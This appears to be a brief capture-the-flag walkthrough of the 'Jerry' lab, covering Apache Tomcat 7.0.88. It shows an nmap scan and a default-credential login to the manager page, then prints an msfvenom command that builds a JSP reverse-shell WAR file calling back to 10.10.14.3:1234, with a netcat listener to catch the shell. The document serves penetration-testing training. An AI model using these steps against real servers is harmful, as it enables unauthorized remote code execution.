Skip to content

Jerry

Easy External Tomcat Java Penetration Tester Level 1 Remote Code Execution A05:2021-Security Misconfiguration Default Credentials Malicious WAR File Upload

Looking Deeper

$ nmap -sV -sC -Pn --min-rate 5000 10.129.136.9
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 19:41 EDT
Nmap scan report for 10.129.136.9
Host is up (0.17s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.85 seconds

go to http://10.129.136.9:8080/manager/html it will ask for auth, but you can get the auth easily

then go to WAR file to deploy to try upload some file, it will ask to upload .war file

Getting Some Information

$ searchploit tomcat
...
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)                         | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)                         | jsp/webapps/42966.py
...

it says that tomcat 7.0.88 has vuln at JSP Upload Bypass, then we need to make a bypass file to upload to the website

you can check available payload to make a .war file

$ msfconsole
...
msf> search tomcat
...
msf> use exploit/multi/http/tomcat_jsp_upload_bypass
msf exploit(multi/http/tomcat_jsp_upload_bypass) > show payloads

Compatible Payloads
===================

   #  Name                                Disclosure Date  Rank    Check  Description
   -  ----                                ---------------  ----    -----  -----------
   0  payload/generic/custom                               normal  No     Custom Payload
   1  payload/generic/shell_bind_tcp                       normal  No     Generic Command Shell, Bind TCP Inline
   2  payload/generic/shell_reverse_tcp                    normal  No     Generic Command Shell, Reverse TCP Inline
   3  payload/generic/ssh/interact                         normal  No     Interact with Established SSH Connection
   4  payload/java/jsp_shell_bind_tcp                      normal  No     Java JSP Command Shell, Bind TCP Inline
   5  payload/java/jsp_shell_reverse_tcp                   normal  No     Java JSP Command Shell, Reverse TCP Inline

we got the right payload java/jsp_shell_reverse_tcp

make a payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f war > file_reverse.war

send the file to the website at WAR file to deploy, then deploy it

before running the uploaded file, you have to make a netcat connection to get feedback

nc -nlvp 1234

then open the oploaded file and done, check your netcat listener